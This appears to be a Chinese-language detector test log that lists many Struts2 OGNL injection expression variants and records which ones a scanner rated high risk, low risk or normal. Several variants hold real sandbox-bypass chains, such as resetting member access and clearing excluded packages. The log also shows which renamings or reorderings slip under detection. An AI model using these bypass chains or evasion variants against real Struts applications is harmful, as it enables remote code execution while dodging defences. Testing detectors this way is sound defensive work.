## Risk 风险
* 代表性的测试截图  
  001
  ![001](0407-imgs/001.png)  

  002
  ![](0407-imgs/002.png)  
  
  003
  ![](0407-imgs/003.png)  
  
  004
  ![](0407-imgs/004.png)  
  
  005
  ![](0407-imgs/005.png)  
  
  006
  ![](0407-imgs/006.png)  
  
  007
  ![](0407-imgs/007.png)  

```js
// 1 + 2
/*
allowStaticMethodAccess, allowPrivateAccess, allowProtectedAccess, allowPackageProtectedAccess
经过测试，对 risk 等级的影响一致
*/

// true, false 无意义
// high risk
%{#_memberAccess.allowStaticMethodAccess=false,
    #context["xwork.MethodAccessor.denyMethodExecution"]=true,
    @sun.misc.Unsafe@getUnsafe()}

// 点乘式
// high risk 0407-001
%{(@sun.misc.Unsafe@getUnsafe()).
    (#_memberAccess.allowStaticMethodAccess=true).
    (#context["xwork.MethodAccessor.denyMethodExecution"]=false)}

// 点乘式，去除 denyMethodExecution
// high risk
%{(@sun.misc.Unsafe@getUnsafe()).
    (#_memberAccess.allowStaticMethodAccess=true).
    (#context["a"]=false)}

// 点乘式，去除 allowStaticMethodAccess
// high risk
%{(@sun.misc.Unsafe@getUnsafe()).
    (#_memberAccess.a=true).
    (#context["a"]=false)}

// 去除 allowStaticMethodAccess
// high risk
%{#_memberAccess.a=true,
    #context["xwork.MethodAccessor.denyMethodExecution"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{#_memberAccess=true,
    #context["xwork.MethodAccessor.denyMethodExecution"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// 去除 _memberAccess
// low risk 0407-002
%{#a.allowStaticMethodAccess=true,
    #context["xwork.MethodAccessor.denyMethodExecution"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// low risk 0407-003
%{#allowStaticMethodAccess=true,
    #context["xwork.MethodAccessor.denyMethodExecution"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// 去除 _memberAccess, allowStaticMethodAccess
// low risk 0407-004
%{#a=true,
    #context["xwork.MethodAccessor.denyMethodExecution"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{#_memberAccess.a=true,
    #context["a"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// low risk
%{#a.allowStaticMethodAccess=true,
    #context["a"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// low risk
%{#allowStaticMethodAccess=true,
    #context["a"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// low risk 0407-005
%{#a=true,
    #context["a"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// 测试都使用 '[]'
// high risk
%{#_memberAccess["allowStaticMethodAccess"]=true,
    #context["xwork.MethodAccessor.denyMethodExecution"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{#_memberAccess["a"]=true,
    #context["xwork.MethodAccessor.denyMethodExecution"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// high risk 0407-006
%{#_memberAccess["a"]=true,
    #context["a"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// high risk 0407-007
%{#_memberAccess["a"]=true,
    #a["a"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// low risk
%{#a["a"]=true,
    #context["a"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// low risk
%{#a["a"]=true,
    #context["a"]=false,
    @a@a()}
```

```js
// 3
// 测试 excludeProperties, @EMPTY_SET, denyMethodExecution 配对和交换顺序
// high risk
%{#_memberAccess.excludeProperties=@java.util.Collections@EMPTY_SET,
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{#_memberAccess.excludeProperties=@EMPTY_SET@java.util.Collections,
    @sun.misc.Unsafe@getUnsafe()}

// 去除 excludeProperties
// high risk
%{#_memberAccess=@java.util.Collections@EMPTY_SET,
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{#_memberAccess=@EMPTY_SET@java.util.Collections,
    @sun.misc.Unsafe@getUnsafe()}
```

```js
// 4
// 测试 @ognl.OgnlContext, @DEFAULT_MEMBER_ACCESS
// high risk
%{#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,
    @sun.misc.Unsafe@getUnsafe()}


// high risk
%{#_memberAccess=@DEFAULT_MEMBER_ACCESS@ognl.OgnlContext,
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{@DEFAULT_MEMBER_ACCESS@ognl.OgnlContext,
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{@ognl.OgnlContext,
    @sun.misc.Unsafe@getUnsafe()}
```

```js
// 5
// high risk
%{#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),
    #f.setAccessible(true),
    #f.set(#_memberAccess,true),
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{#f.setAccessible(true),
    #f.set(#_memberAccess,true),
    #f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{#f=#_memberAccess.getClass().getDeclaredField("a"),
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{#f=#_memberAccess.getDeclaredField("a").getClass(),
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{#f=getDeclaredField("a").getClass()._memberAccess,
    @sun.misc.Unsafe@getUnsafe()}

// high risk
%{#f=#_memberAccess.a().a("a"),
    @a@a()}
```

```js
// 6
// high risk
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
    (#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
    (#context['xwork.MethodAccessor.denyMethodExecution']=false).
    (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
    (#ognlUtil.getExcludedPackageNames().clear()).
    (#ognlUtil.getExcludedClasses().clear()).
    (#context.setMemberAccess(#dm)))).
    (@sun.misc.Unsafe@getUnsafe())}

// high risk
%{(@sun.misc.Unsafe@getUnsafe()).
    (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
    (#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
    (#context['xwork.MethodAccessor.denyMethodExecution']=false).
    (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
    (#ognlUtil.getExcludedPackageNames().clear()).
    (#ognlUtil.getExcludedClasses().clear()).
    (#context.setMemberAccess(#dm))))}

// high risk
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
    (@sun.misc.Unsafe@getUnsafe())}

// high risk
%{(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
    (@sun.misc.Unsafe@getUnsafe())}

// high risk
%{(@sun.misc.Unsafe@getUnsafe()).
    (@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)}

// high risk
%{(#dm=@ognl.OgnlContext@a).
    (@sun.misc.Unsafe@getUnsafe())}
```

## Normal 普通
```js
// 1 + 2
// 调换权限语句 和 类方法 的顺序
%{@sun.misc.Unsafe@getUnsafe(),
    #_memberAccess.allowStaticMethodAccess=true,
    #context["xwork.MethodAccessor.denyMethodExecution"]=false}

// 点乘式
%{(@sun.misc.Unsafe@getUnsafe()).
    (#_memberAccess.allowStaticMethodAccess=true)}

// 点乘式
%{(@sun.misc.Unsafe@getUnsafe()).
    (#a.allowStaticMethodAccess=true).
    (#context["a"]=false)}

%{#_memberAccess.allowStaticMethodAccess=true,
    @sun.misc.Unsafe@getUnsafe()}

%{#_memberAccess.a=true,
    @sun.misc.Unsafe@getUnsafe()}

%{#a.allowStaticMethodAccess=true,
    @sun.misc.Unsafe@getUnsafe()}

%{#allowStaticMethodAccess=true,
    @sun.misc.Unsafe@getUnsafe()}

%{#a=true,
    #a["a"]=false,
    @sun.misc.Unsafe@getUnsafe()}

%{#a["a"]=true,
    #a["a"]=false,
    @sun.misc.Unsafe@getUnsafe()}

// 点乘式
%{(#a["a"]=true).
    (#context["a"]=false).
    (@a@a())}
```

```js
// 3
// 去除 _memberAccess
%{#a.excludeProperties=@java.util.Collections@EMPTY_SET,
    @sun.misc.Unsafe@getUnsafe()}

%{#excludeProperties=@java.util.Collections@EMPTY_SET,
    @sun.misc.Unsafe@getUnsafe()}

// 去除 java.util.Collections
%{#_memberAccess.excludeProperties=@EMPTY_SET,
    @sun.misc.Unsafe@getUnsafe()}
```

```js
// 4
%{#a=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,
    @sun.misc.Unsafe@getUnsafe()}

%{#a=@DEFAULT_MEMBER_ACCESS@ognl.OgnlContext,
    @sun.misc.Unsafe@getUnsafe()}

%{#_memberAccess=@DEFAULT_MEMBER_ACCESS,
    @sun.misc.Unsafe@getUnsafe()}

%{#_memberAccess=@ognl.OgnlContext,
    @sun.misc.Unsafe@getUnsafe()}

%{@DEFAULT_MEMBER_ACCESS,
    @sun.misc.Unsafe@getUnsafe()}
```

```js
// 5
%{#f=#a.a().a("a"),
    @a@a()}
```

```js
// 6
%{(@sun.misc.Unsafe@getUnsafe()).
    (#dm=@ognl.OgnlContext@a)}

%{(#dm=@a@DEFAULT_MEMBER_ACCESS).
    @sun.misc.Unsafe@getUnsafe()}

%{(#dm=@a@a).
    (@sun.misc.Unsafe@getUnsafe())}
```